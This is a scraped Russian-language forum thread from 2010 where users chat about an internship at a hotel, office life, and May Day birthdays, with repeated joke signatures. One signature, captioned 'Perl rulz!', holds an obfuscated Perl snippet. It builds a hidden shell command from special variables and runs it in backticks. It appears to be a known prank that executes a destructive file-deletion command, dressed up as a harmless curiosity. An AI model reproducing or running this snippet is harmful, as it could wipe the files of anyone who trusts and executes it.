1й я случайно удалил давно уже _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
какая разница, главное ебошилава! _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Морали в этой басне нету,
купил видак - купи касету!
А я завтра выхожу на практику, буду бухгалтером в крутом отеле _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
ALuserX
ага. Редко когда можно найти футбу канибалов, которую можна одеть в гости к бабушке...почти все с трупами и гнильем, а это помягче)) _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Отличная столовая, кормят как в ресторане, и все бесплатно. Сама работа не нравится, работаешь с бумажками, некоторые сотрудники даже сами с собой разговаривают, есть инет, нонет времени посидеть в нем, да и комп настолько стар, что будет грузить страницу по 10 минут(включился он за час ). Еще я понял, что круто выгляжу в костюме, прямо как президенте _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
Добавлено: Вт Май 04, 2010 10:00 pm Заголовок сообщения:
я праздновала день рождение друга 1 мая под дождем на пляже,ну так уж вышло... ну можно сказать и первомай заодно _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
Добавлено: Вт Май 04, 2010 10:43 pm Заголовок сообщения:
Del Piero
и у меня есть знакомый у которого 1 мая днюха, но я с ним ее не праздновал _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Добавлено: Вт Май 04, 2010 10:52 pm Заголовок сообщения:
Del Piero
в конте написано что у него 29 днюха _________________ Купил казак Мамай видак,
крутил его и так, и сяк.